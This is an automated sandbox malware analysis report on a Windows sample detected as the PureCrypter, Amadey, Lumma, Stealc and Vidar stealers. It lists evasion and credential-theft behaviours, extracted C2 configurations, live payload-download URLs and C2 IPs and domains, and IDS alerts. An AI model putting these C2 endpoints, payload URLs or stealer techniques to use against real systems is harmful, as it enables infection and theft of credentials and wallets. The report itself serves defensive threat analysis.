Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1554046
MD5: a12c379025757cc07db3a875813f8b1e
SHA1: f6ef51d787cf590dce1d9f2b1cb66d4794eeb89e
SHA256: 6515d31657b9961bb6b8bf78f59a27925e6bbdefee8b91c51d4133c9aea703e1
Tags: exeuser-Bitsight
Infos:

Detection

PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Attempt to bypass Chrome Application-Bound Encryption
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadeys stealer DLL
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected Stealc
Yara detected Vidar stealer
AI detected suspicious sample
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Creates HTML files with .exe extension (expired dropper behavior)
Creates multiple autostart registry keys
Detected PureCrypter Trojan
Disable Windows Defender notifications (registry)
Disable Windows Defender real time protection (registry)
Disables Windows Defender Tamper protection
Drops PE files to the document folder of the user
Drops PE files to the user root directory
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Found many strings related to Crypto-Wallets (likely being stolen)
Found suspicious powershell code related to unpacking or dynamic code loading
Hides threads from debuggers
Loading BitLocker PowerShell Module
LummaC encrypted strings found
Machine Learning detection for sample
Modifies windows update settings
Monitors registry run keys for changes
PE file contains section with special chars
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sigma detected: MSHTA Suspicious Execution 01
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: Suspicious Script Execution From Temp Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the user directory
Enables debug privileges
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Installs a global mouse hook
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for the Microsoft Outlook file path
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Sigma detected: Browser Started with Remote Debugging
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Wscript Shell Run In CommandLine
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
PureCrypter According to zscaler, PureCrypter is a fully-featured loader being sold since at least March 2021The malware has been observed distributing a variety of remote access trojans and information stealersThe loader is a .NET executable obfuscated with SmartAssembly and makes use of compression, encryption and obfuscation to evade antivirus software productsPureCrypter features provide persistence, injection and defense mechanisms that are configurable in Googles Protocol Buffer message format No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.purecrypter
Name Description Attribution Blogpost URLs Link
Lumma Stealer, LummaC2 Stealer Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
Name Description Attribution Blogpost URLs Link
Amadey Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
Name Description Attribution Blogpost URLs Link
Stealc Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
Name Description Attribution Blogpost URLs Link
Vidar Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

AV Detection

barindex
Source: file.exe Avira: detected
Source: http://31.41.244.11/files/k4pDgO.ps1 Avira URL Cloud: Label: phishing
Source: http://185.215.113.206/68b591d6548ec281/msvcp140.dllLp Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.php?V Avira URL Cloud: Label: malware
Source: http://185.215.113.16/off/random.exeX Avira URL Cloud: Label: phishing
Source: https://fadehairucw.store/N Avira URL Cloud: Label: malware
Source: http://31.41.244.11/files/file1.exeJ Avira URL Cloud: Label: phishing
Source: https://crisiwarny.store/8 Avira URL Cloud: Label: malware
Source: https://presticitpo.store/h Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.phpZ Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.phpX Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.phpS Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.phpd Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.php/o Avira URL Cloud: Label: malware
Source: http://185.215.113.16/luma/random.exey Avira URL Cloud: Label: phishing
Source: http://185.215.113.206/c4becf79229cb002.phpa Avira URL Cloud: Label: malware
Source: http://185.215.113.16/steam/random.exep Avira URL Cloud: Label: phishing
Source: http://185.215.113.206/c4becf79229cb002.php1t# Avira URL Cloud: Label: malware
Source: https://crisiwarny.store:443/apiv Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.phpr Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.php%WpO Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.phpv Avira URL Cloud: Label: malware
Source: 00000015.00000002.2487176719.0000000000FE1000.00000040.00000001.01000000.0000000E.sdmp Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: 4136f86ac7.exe.9108.37.memstrmin Malware Configuration Extractor: StealC {"C2 url": "185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}
Source: 4136f86ac7.exe.9108.37.memstrmin Malware Configuration Extractor: LummaC {"C2 url": ["navygenerayk.store", "fadehairucw.store", "necklacedmny.store", "founpiuer.store", "thumbystriw.store", "presticitpo.store", "scriptyprefej.store", "crisiwarny.store"], "Build id": "4SD0y4--legendaryy"}
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe ReversingLabs: Detection: 36%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[1].exe ReversingLabs: Detection: 36%
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe ReversingLabs: Detection: 36%
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe ReversingLabs: Detection: 36%
Source: file.exe ReversingLabs: Detection: 36%
Source: Submited Sample Integrated Neural Analysis Model: Matched 99.9% probability
Source: file.exe Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C636C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer, 0_2_6C636C80
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C78A9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util, 0_2_6C78A9A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C784440 PK11_PrivDecrypt, 0_2_6C784440
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C754420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free, 0_2_6C754420
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C7844C0 PK11_PubEncrypt, 0_2_6C7844C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C7D25B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt, 0_2_6C7D25B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C768670 PK11_ExportEncryptedPrivKeyInfo, 0_2_6C768670
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C78A650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext, 0_2_6C78A650
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C76E6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free, 0_2_6C76E6E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C7AA730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError, 0_2_6C7AA730
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C7B0180 SECMIME_DecryptionAllowed,SECOID_GetAlgorithmTag_Util, 0_2_6C7B0180
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49724 version: TLS 1.2
Source: unknown HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49730 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.5:49732 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.5:49743 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.126.32.68:443 -> 192.168.2.5:49746 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.126.32.68:443 -> 192.168.2.5:49786 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.5:50222 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.174.133:443 -> 192.168.2.5:50244 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.174.133:443 -> 192.168.2.5:50247 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.174.133:443 -> 192.168.2.5:50252 version: TLS 1.2
Source: unknown HTTPS traffic detected: 192.64.117.218:443 -> 192.168.2.5:50254 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.174.133:443 -> 192.168.2.5:50256 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.174.133:443 -> 192.168.2.5:50257 version: TLS 1.2
Source: unknown HTTPS traffic detected: 176.9.192.202:443 -> 192.168.2.5:50258 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.174.133:443 -> 192.168.2.5:50260 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.174.133:443 -> 192.168.2.5:50264 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.210.122.61:443 -> 192.168.2.5:50270 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.174.133:443 -> 192.168.2.5:50273 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50278 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50282 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50285 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50286 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50290 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50292 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50294 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.197.127.21:443 -> 192.168.2.5:50296 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50297 version: TLS 1.2
Source: unknown HTTPS traffic detected: 176.9.192.202:443 -> 192.168.2.5:50298 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50301 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50303 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50304 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50306 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50309 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50311 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50313 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50316 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.197.127.21:443 -> 192.168.2.5:50324 version: TLS 1.2
Source: Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2445298373.000000006C69D000.00000002.00000001.01000000.0000000A.sdmp
Source: Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmp
Source: Binary string: nss3.pdb source: file.exe, 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmp
Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: 0ac2a0f3ae.exe, 00000024.00000002.3119535099.0000000000A12000.00000040.00000001.01000000.00000019.sdmp, 0ac2a0f3ae.exe, 00000024.00000003.2983049780.0000000004F00000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2445298373.000000006C69D000.00000002.00000001.01000000.0000000A.sdmp
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Directory queried: number of queries: 1583
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior

Networking

barindex
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.5:49704 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.206:80 -> 192.168.2.5:49704
Source: Network traffic Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.5:49704 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.206:80 -> 192.168.2.5:49704
Source: Network traffic Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.5:49704 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.5:50229 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.5:50234
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:50242 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:50250 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2856121 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M2 : 192.168.2.5:50259 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2057129 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store) : 192.168.2.5:61484 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057119 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (navygenerayk .store) : 192.168.2.5:65482 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057123 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacedmny .store) : 192.168.2.5:61200 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057125 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store) : 192.168.2.5:58600 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057101 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (scriptyprefej .store) : 192.168.2.5:50625 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:50271 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2057121 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (founpiuer .store) : 192.168.2.5:54900 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057131 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store) : 192.168.2.5:54876 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:50287 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:50291 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:50289 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2057131 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store) : 192.168.2.5:54284 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057127 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store) : 192.168.2.5:62605 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057123 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacedmny .store) : 192.168.2.5:52747 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057121 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (founpiuer .store) : 192.168.2.5:56622 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057129 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store) : 192.168.2.5:50952 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057119 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (navygenerayk .store) : 192.168.2.5:60270 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057101 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (scriptyprefej .store) : 192.168.2.5:49989 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:50295 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2057125 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store) : 192.168.2.5:54551 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057127 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store) : 192.168.2.5:55296 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:50307 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:50319 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2057131 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store) : 192.168.2.5:49494 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057123 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacedmny .store) : 192.168.2.5:60239 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057101 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (scriptyprefej .store) : 192.168.2.5:64465 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057127 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store) : 192.168.2.5:60011 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057129 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store) : 192.168.2.5:56957 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057121 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (founpiuer .store) : 192.168.2.5:49173 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057125 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store) : 192.168.2.5:55407 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057119 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (navygenerayk .store) : 192.168.2.5:59274 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:50323 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:50327 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:50244 -> 172.67.174.133:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:50247 -> 172.67.174.133:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50247 -> 172.67.174.133:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50244 -> 172.67.174.133:443
Source: Network traffic Suricata IDS: 2018581 - Severity 1 - ET MALWARE Single char EXE direct download likely trojan (multiple families) : 192.168.2.5:50254 -> 192.64.117.218:443
Source: Network traffic Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.5:50270 -> 23.210.122.61:443
